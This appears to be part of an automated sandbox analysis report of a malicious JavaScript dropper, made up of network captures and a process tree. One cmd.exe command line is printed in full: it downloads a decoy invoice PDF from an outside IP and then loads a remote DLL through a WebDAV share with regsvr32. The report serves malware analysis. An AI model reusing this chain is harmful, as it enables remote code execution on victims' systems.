                            Data Ascii: 7wcICo$*5I}WBm1/yiL}s_,vjaAny!mc=4LdLOJ*H_[?EfW$:P2"HI34PY\1{}*0c:S!4,fzx6"4Ts~~|5fUGKhe?0P3K~0d80]f6WD


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.449731193.143.1.20588887660C:\Windows\System32\net.exe
                            TimestampBytes transferredDirectionData
                            Jan 15, 2025 10:09:07.636424065 CET107OUTOPTIONS / HTTP/1.1
                            Connection: Keep-Alive
                            User-Agent: DavClnt
                            translate: f
                            Host: 193.143.1.205:8888
                            Jan 15, 2025 10:09:08.420476913 CET237INHTTP/1.1 500 Internal Server Error
                            Server: nginx/1.22.1
                            Date: Wed, 15 Jan 2025 09:09:08 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 22
                            Connection: keep-alive
                            X-Content-Type-Options: nosniff
                            Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                            Data Ascii: Internal server error


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:04:09:02
                            Start date:15/01/2025
                            Path:C:\Windows\System32\wscript.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\31070304561863532281.js"
                            Imagebase:0x7ff7aa620000
                            File size:170'496 bytes
                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:1
                            Start time:04:09:02
                            Start date:15/01/2025
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\19908223222030.dll
                            Imagebase:0x7ff6f5d70000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:2
                            Start time:04:09:02
                            Start date:15/01/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:3
                            Start time:04:09:02
                            Start date:15/01/2025
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
                            Imagebase:0x7ff788560000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:04:09:06
                            Start date:15/01/2025
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
                            Imagebase:0x7ff6bc1b0000
                            File size:5'641'176 bytes
                            MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:5
                            Start time:04:09:06
                            Start date:15/01/2025
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c net use \\193.143.1.205@8888\davwwwroot\
                            Imagebase:0x7ff6f5d70000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:6
                            Start time:04:09:06
                            Start date:15/01/2025
                            Path:C:\Windows\System32\net.exe
                            Wow64 process (32bit):false
                            Commandline:net use \\193.143.1.205@8888\davwwwroot\
                            Imagebase:0x7ff747e60000
                            File size:59'904 bytes
                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:7
                            Start time:04:09:07
                            Start date:15/01/2025
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                            Imagebase:0x7ff74bb60000
                            File size:3'581'912 bytes
                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:8
                            Start time:04:09:07
                            Start date:15/01/2025
                            Path:C:\Windows\System32\svchost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Imagebase:0x7ff6eef20000
                            File size:55'320 bytes
                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:9
                            Start time:04:09:07
                            Start date:15/01/2025
                            Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1704,i,14534165756939046791,6243001767822148807,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                            Imagebase:0x7ff74bb60000
                            File size:3'581'912 bytes
                            MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            No disassembly